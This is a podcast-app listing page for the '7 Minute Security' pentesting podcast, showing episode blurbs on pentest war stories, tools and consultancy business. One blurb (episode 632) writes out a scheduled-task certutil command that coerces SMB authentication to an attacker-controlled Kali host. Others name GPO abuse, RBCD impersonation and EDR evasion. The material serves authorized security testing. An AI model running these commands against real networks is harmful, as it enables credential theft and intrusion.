Brian Johnson

7 Minute Security

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Vizitează neapărat site-ul podcastului și susține-i creatorul: 7MinSec.com

Autor

Brian Johnson

Categorie

Technology

Site-ul podcastului

7MinSec.com

Cel mai nou episod

10 iul. 2026

Unde asculți?

Podcasturi în aplicație Replaio Radio În curând

Podcasturile ajung în curând în aplicație. Instaleaz-o acum și fii primul care descoperă o abordare complet nouă a podcasturilor

Descarcă din Google Play Instalează gratuit Android aproape 10 mil. descărcări · nota 4,8 iOS în curând

Episoade

7MS #655: Happy Hacking Holidays 30.12.2024

Today we're doing a milkshake of several topics: wireless pentest pwnage, automating the boring pentest stuff with  cursor.ai , and some closing business thoughts at 7MinSec celebrates its 7th year as a security consultancy.  Links discussed today: AWUS036ACH wifi card (not my favorite anymore) Panda PAU09 N600 (love this one!) The very important Github issue that helped me better understand BPFs...

7MS #654: Tales of Pentest Pwnage – Part 67 13.12.2024

Today we've got some super cool stuff to cover today!  First up,  BPATTY v1.4  is out and has a slug of cool things: A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng Syntax on using two different tools to parse creds from  Dehashed An updated tutorial on using  Gophish  for phishing campaigns The cocoa-flavored cherry on top is a tale of pentest pwnage that...

7MS #653: How to Succeed in Business Without Really Crying – Part 20 06.12.2024

Hey friends, today we're talking about tips to effectively present your technical assessment to a variety of audiences – from lovely IT and security nerds to C-levels, the board and beyond!

7MS #652: Securing Your Mental Health - Part 6 02.12.2024

Today's episode talks about some things that helped me get through a stressful and hospital-visit-filled Thanksgiving week, including: Journaling Meditation (An activity I'm ashamed of but has actually done  wonders for my mental health)

7MS #651: Tales of Pentest Pwnage – Part 66 22.11.2024

Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned: Definitely consider  BallisKit  for your EDR-evasion needs If you get local admin to a box, enumerate, enumerate, enumerate!  There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges!

7MS #650: Tales of Pentest Pwnage - Part 65 15.11.2024

Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of  PowerUpSQL  that helped me find a "hidden" SQL account, and  that  account ended up being the key to the entire pentest!  I wonder how many hidden SQL accounts I've missed on past pentests….SIGH! Check out the awesome BloodHound gang thread about this  here . Also, can't get  Rubeus  monitor mo...

7MS #649: First Impressions of Twingate 08.11.2024

Today we take a look at a zero-trust / ditch-your-VPN solution called  Twingate  (not a sponsor but we'd like them to be)!  It also doubles nicely as a primary or backup connection for your DIY pentest dropboxes which we've talked about quite a bit  here .  In other news, we've moved from Teachable to Coursestack, so if you've bought training/ebooks with us before, you should've received some emai...

7MS #648: First Impressions of Level.io 01.11.2024

Hey friends, today I'm sharing my first (and non-sponsored) impressions of Level.io, a cool tool for managing Windows, Mac and Linux endpoints. It fits a nice little niche in our pentest dropbox deployments, it has an attractive price point and their support is fantastic.

7MS #647: How to Succeed in Business Without Really Crying – Part 19 25.10.2024

Today we're talkin' business – specifically how to make your report delivery meetings calm, cool and collect (both for you and the client!).

7MS #646: Baby's First Incident Response with Velociraptor 18.10.2024

Hey friends, today I'm putting my blue hat on and dipping my toes in incident response by way of playing with  Velociraptor , a very cool (and free!) tool to find evil in your environment.  Perhaps even better than the price tag, Velociraptor runs as a single binary you can deploy to spin up a server and then request endpoints to "phone home" to you by way of GPO scheduled task.  The things I talk...

7MS #645: How to Succeed in Business Without Really Crying - Part 18 14.10.2024

Today I do a short travelogue about my trip to Washington, geek out about some cool training I did with  Velociraptor , ponder drowning myself in blue team knowledge with  XINTRA LABS , and share some thoughts about the conference talk I gave called  7 Ways to Panic a Pentester.

7MS #644: Tales of Pentest Pwnage – Part 64 04.10.2024

Hey!  I'm speaking in Wanatchee, Washington next week at the  NCESD conference  about 7 ways to panic a pentester!  Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate!  It also emphases that cracking NETLM/NETNTLMv1 isn't super easy to remember the steps for (at least for me) but  this crack.sh article makes it a bit easier!

7MS #643: DIY Pentest Dropbox Tips – Part 11 27.09.2024

Today we continue where we left off in episode  641 , but this time talking about how to automatically deploy and install a Ubuntu-based dropbox!  I also share some love for  exegol as an all-in-one Active Directory pentesting platform.

7MS #642: Interview with Ron Cole of Immersive Labs 23.09.2024

Ron Cole of Immersive Labs joins us to talk pentest war stories, essential skills he learned while serving on a SOC, and the various pentest training and range platforms you can use to sharpen your security skills! Here are the links Ron shared during our discussion: VetSec Fortinet Veterans Program Immersive Labs Cyber Million FedVTE

7MS #641: DIY Pentest Dropbox Tips – Part 10 13.09.2024

Today we're revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible,  Cursor  and  Level .  Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition of  Light Pentest LITE training !

7MS #640: Tales of Pentest Pwnage – Part 63 07.09.2024

This was my favorite pentest tale of pwnage to date!  There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here: Sprinkled  farmer  files around the environment Found high-priv boxes with WebClient enabled Added "ghost" machine to the Active Directory (we'll call it GHOSTY) RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against...

7MS #639: Tales of Pentest Pwnage - Part 62 03.09.2024

Today's tale of pentest pwnage talks about the dark powers of the  net.py  script from  impacket .

7MS #638: Tales of Pentest Pwnage – Part 61 23.08.2024

Today we're talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges: Check the C: drive! If you get local admin and the system itself looks boring, check root of C – might have some interesting scripts or folders with tools that have creds in them. Also look at Look at  Get-ScheduledTasks Find ids and passwords easily in Snaffler output with this  Sn...

7MS #637: BPATTY[RELOADED] Release Party 17.08.2024

Hello friends, I'm excited to release BPATTY[RELOADED] into the world at  https://bpatty.rocks ! – which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!

7MS #636: A Prelude to BPATTY(RELOADED) 12.08.2024

Artificial hype alert!  I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation.  It's weird.  But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than  BPATTY v...

7MS #635: Eating the Security Dog Food - Part 7 03.08.2024

Today we're talking about eating the security dog food – specifically: Satisfying  critical security control #1 Using the  Atlassian  family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging  Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)

7MS #634: Tales of Pentest Pwnage - Part 60 26.07.2024

Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop  Farmer  "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using  vcenter_saml_login

7MS #633: How to Create a Security Knowledgebase with Docusaurus 19.07.2024

Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using  Docusaurus !  It's cool, it's free, it's from Meta and you can get up and going in just a few commands – check out their  getting started guide  to get rockin' in about 5 minutes. Important files include: docusaurus.config.js  – for setting the...

7MS #632: Tales of Pentest Pwnage – Part 59 12.07.2024

Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse  helps abuse vulnerable GPOs!  Try submitting a harmless POC first via a scheduled task – like  ping -n 1 your.kali.ip.address .  When you're ready to fire off a task that coerces SMB auth, try  certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder . I'm not 100% sure on this, but I think scheduled tasks captur...

7MS #631: Tales of Pentest Pwnage – Part 58 07.07.2024

Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme  – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot  – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares S...

Ascultă podcastul 7 Minute Security în Replaio

Radio și podcasturi într-o singură aplicație - gratuit și fără înregistrare. Instaleaz-o azi și nu rata lansarea

Descarcă din Google Play

Replaio nu este editorul podcasturilor; numele emisiunilor, coperțile și materialul audio aparțin autorilor lor și sunt distribuite prin fluxuri RSS publice